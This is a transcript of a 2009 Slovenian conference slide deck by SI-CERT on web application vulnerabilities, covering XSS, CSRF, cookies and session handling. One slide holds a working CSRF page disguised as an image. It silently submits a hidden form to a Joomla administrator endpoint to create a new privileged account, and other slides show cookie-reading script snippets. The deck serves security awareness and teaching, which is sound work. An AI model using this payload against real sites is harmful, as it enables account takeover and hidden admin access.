2009 Ranljivosti spletnih aplikacij
-
Upload
tadej-hren -
Category
Internet
-
view
113 -
download
5
description
Transcript of 2009 Ranljivosti spletnih aplikacij
![Page 1: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/1.jpg)
Ranljivosti spletnih
aplikacij
Tadej Hren, SI-CERT(ARNES)
![Page 2: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/2.jpg)
SPLETNA APLIKACIJA
![Page 3: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/3.jpg)
RANLJIVA APLIKACIJA
![Page 4: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/4.jpg)
Top 10
• Cross Site Scripting (XSS)
• Injection Flaws
• Malicious File Execution (RFI)
• Insecure Direct Object Reference
• Cross Site Request Forgery (CSRF)
• Information Leakage and Improper Error Handling
• Broken Authentication and Session Management
• Insecure Cryptographic Storage
• Insecure Communications
• Failure to Restrict URL Access
• ...
![Page 5: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/5.jpg)
Kako deluje splet?
google.com
GET /index.html
HTTP/1.x 200 OK
<html><head><title>Google</title>...
<img src="/images/logo.png"/><input
type=submit value= "Iskanje
Google">...</html>
GET /images/logo.png
HTTP/1.x 200 OK
...........X.v.6...S.Z.j..O..Q.7q..6'M6...f.9
... .....s..z.O.....E.Iv....x...&..
`.....Mr=..INq2....(.....[F.......uI=
T."O.....!"9...........D3..........&J.._,
![Page 6: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/6.jpg)
Bi kdo piškotek?
gmail.com
POST /accounts/Login?service=mail
Email=tadej.hren&Passwd=blabla
HTTP/1.x 200 OK
Set-Cookie: SID=DQA4V8lfg4dtusv
<html><head>...
GET /mail/sendmail?service=mail
Cookie: SID=DQA4V8lfg4dtusv
HTTP/1.x 200 OK
<html><head>...
user:tadej.hren
Cookie:DQA4V8…
…
![Page 7: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/7.jpg)
Javascript
<script>document.cookie</script>
![Page 8: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/8.jpg)
Javascript
<script>alert("Pomembno obvestilo!")</script>
![Page 9: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/9.jpg)
Cross Site Scripting (XSS)
Izkorišča zaupanje uporabnika,
ki ga ima do spletne strani
![Page 10: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/10.jpg)
XSS
DEMO
![Page 11: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/11.jpg)
Cross Site Request Forgery
(CSRF)
Izkorišča zaupanje spletne strani,
ki ga ima do uporabnika
![Page 12: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/12.jpg)
CSRF
SPLETNA STRAN BRSKALNIK UPORABNIK
Avtenticirana seja
X
DEJANJE
![Page 13: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/13.jpg)
CSRF
DEMO
![Page 14: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/14.jpg)
Slikca? <html><body>
<script type="text/javascript">
window.onload = function() {<html><body><script type="text/javascript">
window.onload = function() {
var url = "http://localhost/slojoomla/administrator/index2.php";
var gid = 25;
var user = 'ub3rh4cker';
var pass = 'password';
var email = '[email protected]';
var param = {
name: user, username: user, email: email, password: pass,
password2: pass, gid: gid, block: 0, option: 'com_users',
task: 'save', sendEmail: 1
};
var form = document.createElement('form');
form.action = url; form.method = 'post';
form.target = 'hidden'; form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="clip.png"></body></html>
![Page 15: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/15.jpg)
XSS+CSRF
Anica
Bine
Cene
Davor
Erika
Filip
Grega
Haso
Ivan
Ivan
Joži
Karmen
Luka
Mitja
Nina
Oma
Petra
Rado
Suljo
Šime
Tedi
Urbi
Vera
Zarja
Željko
![Page 16: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/16.jpg)
RANLJIVA APLIKACIJA
![Page 17: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/17.jpg)
RANLJIVA APLIKACIJA
![Page 18: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/18.jpg)
![Page 19: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/19.jpg)
Zaščita?
IE8
FF&NoScript
![Page 20: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/20.jpg)
![Page 21: 2009 Ranljivosti spletnih aplikacij](https://reader033.fdocument.pub/reader033/viewer/2022042623/549c2266ac7959a62a8b464c/html5/thumbnails/21.jpg)
Vprašanja?
• http://www.cert.si
• http://www.arnes.si/si-cert
• http://www.twitter.com/sicert